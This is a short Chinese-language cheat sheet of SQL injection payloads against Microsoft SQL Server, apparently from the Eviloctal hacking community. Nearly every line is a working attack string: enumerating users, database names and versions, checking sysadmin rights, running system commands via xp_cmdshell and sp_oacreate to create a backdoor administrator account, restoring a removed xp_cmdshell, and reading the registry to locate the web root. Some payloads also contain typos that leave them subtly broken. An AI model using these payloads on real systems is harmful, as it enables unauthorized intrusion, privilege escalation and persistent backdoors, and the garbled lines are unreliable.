SQL基本语言--邪恶八进制

' and 0<>user_name()-- [查看用户]
' and 0<>db_name()-- [查看库名]
' and 1=(SELECT IS_SRVROLEMEMBER('sysadmin')) [判断是否是sysadmin权限]
' and 'sa'=(SELECT System_user) [判断是否是SA用户]
' and 0<>(select @@version)-- [查看系统版本]
;use model--[查看数据库角色]
' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)----[查看表名]

;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user admin /add'建立用户

;exec master..xp_cmdshell"net user admin /add"--添加用户
;exec master..xp_cmdshell"net localgroup administrators admin /add"--[提升用户]

and 1=(select IS_SRVROLEMEMBER('sysadmin')) 检测权限 sysadmin

;exec master..xp_cmdshell 'dir c:\' XP_CMDSHELL检测

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell') [xp_cmdshell是否被删除]

;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll' [恢复 XP_CMDSHELL]

;CRE-ATE TABLE newtable(id int IDENTITY(1,1),paths varhar(500)) Declare @test varchar(2) exec master..xp_regread @ rootkey='HKEY_LOCAL_MACHINE',@key='SYSTEM\CunentControlset\Services\W3SVC\Parameters\VirtualRoots\', @value_name='/', values=@test output insert into paths(path) values(@test) [暴网站地址]